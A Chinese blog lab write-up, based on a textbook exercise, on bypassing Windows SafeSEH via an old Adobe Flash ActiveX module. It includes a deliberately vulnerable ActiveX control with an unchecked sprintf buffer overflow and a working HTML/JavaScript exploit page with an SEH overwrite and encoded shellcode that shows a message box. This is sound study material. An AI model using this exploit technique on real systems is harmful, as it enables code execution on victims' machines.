利用Adobe Flash Player ActiveX 控件绕过SafeSEH

最新推荐文章于 2017-08-21 16:33:42 发布
最新推荐文章于 2017-08-21 16:33:42 发布
阅读量1.7k 收藏
点赞数
分类专栏: 漏洞挖掘 文章标签: 漏洞 SafeSEH Adobe Flash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hjxyshell/article/details/42131285
版权


 PS: 参考0day 安全软件漏洞技术305页

构造一个有漏洞的ActiveX控件,代码如下:

void CVulnerSEHCtrl::test(LPCTSTR str)
{
	//AFX_MANAGE_STATE(AfxGetStaticModuleState());

	// TODO: Add your dispatch handler code here
	printf("aaaa");  //定位该函数标记
	char dest[100];
	sprintf(dest, "%s", str);
	int zero=0;
	__try
	{
		zero=1/zero;
	}
	__except(MyException())
	{
	}
}

对应ID: 

//  Class information for CVulnerSEHCtrl
	[
		uuid(8C8F89A8-B525-4339-BF25-13822F16AC07)
	]
	coclass VulnerSEH
	{
		[default] dispinterface _DVulnerSEH;
		[default, source] dispinterface _DVulnerSEHEvents;
	};

构造POC 网页代码如下: 

<html>  
<body>  
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="160" height="260">
  <param name="movie" value="1.swf" />
  <param name="quality" value="high" />
  <embed src="1.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="160" height="260"></embed>
</object>
<object classid="clsid:1F0837F2-15E5-4115-A235-81DA2F73C204" id="test"></object>  
<script>  
var s = "\u9090";
while (s.length < 70) {
s += "\u9090";
}
test.test(s);  
</script>  
</body>  
</html>


安装好低版本Flash ActiveX 后,打开POC网页,到如图所示时,使用OD附加IE


OD附加IE





右键查看字符串

设置断点,然后点击IE中弹框的确定,程序停在断点处,如下图 :



查看——seh链,如下:


运行程序,覆盖seh地址处01C8F560 的处理程序地址, 确定shellcode中覆盖异常处理的位置,


然后使用ollyfindaddr 查找no SafeSEH 模块的跳转地址:



构造shellcode如下:

<html>  
<body>  
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="160" height="260">
  <param name="movie" value="1.swf" />
  <param name="quality" value="high" />
  <embed src="1.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="160" height="260"></embed>
</object>
<object classid="clsid:1F0837F2-15E5-4115-A235-81DA2F73C204" id="test"></object>  
<script>  
var s = "\u9090";
while (s.length < 60) {
s += "\u9090";
}
s += "\u0EEB\u9090";
s += "\u2D1C\u300B";
s += "\u9090\u9090\u9090\u9090";
s += "\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6577\u7473\u6668\u6961\u8b6c\u53c4\u5050\uff53\ufc57\uff53\uf857";
test.test(s);  
</script>  
</body>  
</html>

运行结果如下:



可以用跳转地址有:


PS:这些跳转的结果刚刚能使程序跳刀,异常地址前的四个字节地址处,所以可以被利用。。

寒江雪语
关注
专栏目录
第11章 利用Adobe Flash Player ActiveX 控件绕过SafeSEH
yellow的博客
10-22 285
第11.7节 利用Adobe Flash Player ActiveX 控件绕过SafeSEH
突破SafeSEH机制之一——利用绕过SafeSEH
Yx0051的博客
08-05 815
文章是发在吾爱破解的,这里直接转过来了 我也是个新手,刚学漏洞调试,发现要学的东西太多,想要把漏洞学好,必须精通各类系统底层机制,汇编,PE等等等等太多太多,所以不可能把这些东西都学会了,再去调试漏洞,只能一步步慢慢从简单开始,另外也要学会忽略那些你现在所力不能及的地方,如果实在不懂,就跳过,可能到哪一天你忽然就明白了。所以这里,也是希望同学们想学习的不要被这个东西吓到,静下心来慢慢看,如果有不
利用Adobe Flash Player ActiveX控件绕过SafeSEH
Yx0051的博客
08-05 1353
其实思路就是利用程序加载模块之外的内存地址,找到一个跳板指令绕过SafeSEHflash9.2.124以前是没有SafeSEH的。 这一次试验因为涉及,mfc控件的构建,由于我虚拟机环境是vs 2008 express版本的,所以没有办法创建这种工程,直接拿别人做好的ocx文件用了。 1、第一步就是创建ActiveX mfc工程,创建一个test函数,函数中包含一个字符串覆盖的漏洞,同时注意
利用 Adobe Flash Player ActiveX 控件绕过 SafeSEH(问题及解决方法)
加号减减号的博客
08-21 1056
本次实验出自书籍《0day安全:软件漏洞分析技术》第二版第十一章第 11.7 小节:利用 Adobe Flash Player ActiveX 控件绕过 SafeSEH。 这个实验的实验过程在书中写的比较清楚,网上也有一些博文做了分析,但是我在实验过程中遇到的一些问题在网上并没有找到很好的答案,最后自己摸索着搞出来了,所以我认为这是一个欠缺的内容。因此这篇博文的内容为我本人在该实验过程中遇到的问
flashActiveX
08-10
1、支持Mac .pkg安装对于全球的系统管理员来说,部署Flash Player并时刻保持更新是一项艰巨的任务。在Flash Player 11.9中已经增加了对.pkg的支持,方便部署,而在Flash Player 12中,Adobe听取了系统管理员们的心声,完善了工作流和界面。 2、兼容Windows 7上的IE11 3、为Safari 6.1及更高版本提供安全模式(Safe Mode) 4、为Chrome提供了64位PPAPI Flash Player 5、图形:缓冲区使用Stage3D 6、文本框(TextField)支持补充字符增强 7、Stage3D Creation of Context3D with Profile Array Adobe
[原]client通过ActiveXflash交互方法简介
xingziweiyi的专栏
01-23 980
client要与flash交互,只要使用以下3个函数: HRESULT CallFunction([in] BSTR request, [out, retval] BSTR* response); HRESULT SetReturnValue([in] BSTR returnValue); void FlashCall([in] BSTR request); CallFunction和Se
突破SafeSEH机制之二——利用未启用SafeSEH模块绕过SafeSEH
Yx0051的博客
08-07 776
敲黑板敲黑板~~今天我们继续~ 上次讲到SafeSEH的突破,介绍了一个简单的利用绕过SafeSEH突破SafeSEH机制之一——利用绕过SafeSEH 本篇总共遇到了3个问题还没有解决,有没有大神帮我解答一下,我都把问题背景给标黄了。 突破思路: 那么有3种情况,系统可以允许异常处理函数执行: 1、异常处理函数位于加载模块内存范围之外,DEP关闭 2、异常处理函数位于加载模块内存
突破SafeSEH机制之三——利用加载模块之外的地址绕过SafeSEH
Yx0051的博客
08-09 789
敲黑板敲黑板~睡着的同学醒醒了!! 今天我们继续突破SafeSEH,上次讲到第二种思路利用未启用SafeSEH模块绕过SafeSEH 今天来实现最后一个突破思路:       异常处理函数位于加载模块内存范围之外,DEP关闭------->>>在加载模块内存范围外找一个跳板指令就可以转入shellcode执行 上次我们是找到了一个加载模块内存范围内找到的一个指令,今天我们要在加载内存范围外
页面上FlashActiveX控件的激活
木头的专栏
05-31 2294
最近一个项目的菜单采用Flash来做,可是新的浏览器上老是要点击一下激活后才可使用,查了相关资料才知道原来可以通过从外部文件加载控件的方法来实现不应激活即可使用。1、document.write动态加载控件: HTML 文件 -->html>  body leftmargin=0 topmargin=0 scroll=no>    script src="docwrite.js">scri
Adobe Flash player Activex控件问题解决方法
mimi00x的专栏
07-20 1万+
<br />Adobe Flash player Activex控件问题解决方法 网上很多方法都是扯淡 症状: 网页看不了flash了...而且mpc也无法播放swf了 显示无法创建shockwave控件....更新了flash player结果中间出现失败 Error 1904 提示一个flash9.ocx无法注册然后IE的插件就失效了。真是郁闷啊....重装flash8player也不行。 这期间IE一直提示要安装adobe flash playeractive,我点击安装都是成功,但就是再次访问仍然提
OD插件-OllyFindAddr
09-11
0day2中讲的,用来搜寻特定指令用的插件
OllyFindAddr.dll
10-09
OllyFindAddr.dll 搜寻特定指令用的插件 插件出自《0day》一书
ie浏览器.29版flash离线安装包
10-24
有直接和谐掉地区问题的最新版的flash插件,这里我就不粘贴了,因为那是别人的东西,这是地方http://www.songyongzhi.com/FlashPlayer.html#comments
Adobe Flash Player ActiveX 不能安装的解决方法
热门推荐
Rin_Ling的专栏
06-10 3万+
这是一篇有普遍应用性和实际意义的文章,目的是为了解决计算机用户普遍遇到过并深感头疼的一个问题——“Adobe Flash Player ActiveX 不能安装”。 具体原因和发生的情况有很多种,不一而论,直说其特征——就是不能显示网页的 Flash 格式的文件。有的用户反复卸载、安装 Flash Player 均不能显示 Flash ,有的用户进行 ActiveX 控件安装或者单独安装 Fla
flash倒计时制作
YFCMS博客
03-19 2003
1.启动Flash,新建元件,命名为“倒计时”,行为中选择“影片剪辑”,确定后进入元件编辑窗口。 2.点击文本工具,在属性中选择“静态文本”,划出一个文本框,设置好文本框的参数,输入内容“距离。。。还有:”。 3.点击文本工具,在属性中选择“动态文本”,划出一个文本框,设置好文本框的参数,变量设置为“DaoJiShiText”。   4.命名所在层为“倒计
adobe flash player Activex安装失败?
做最好的自己
06-29 7692
最近浏览一些网站发现一些flash无法显示,于是下载了adobe flash player Activex,但是一直提示安装失败,在网上查了一下发现是flash 8的原因,卸载flash 8,再安装一切顺利!
python http OPTIONS请求
ShadowAssassin的专栏
03-30 7882
通过发送http OPTIONS请求,可以获取 http允许的方法(我这里主要测试网站是否开启webDav),测试如下: import urllib2 import json import httplib url='192.168.149.131' def http_get(): conn = httplib.HTTPConnection(url) conn.request("
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值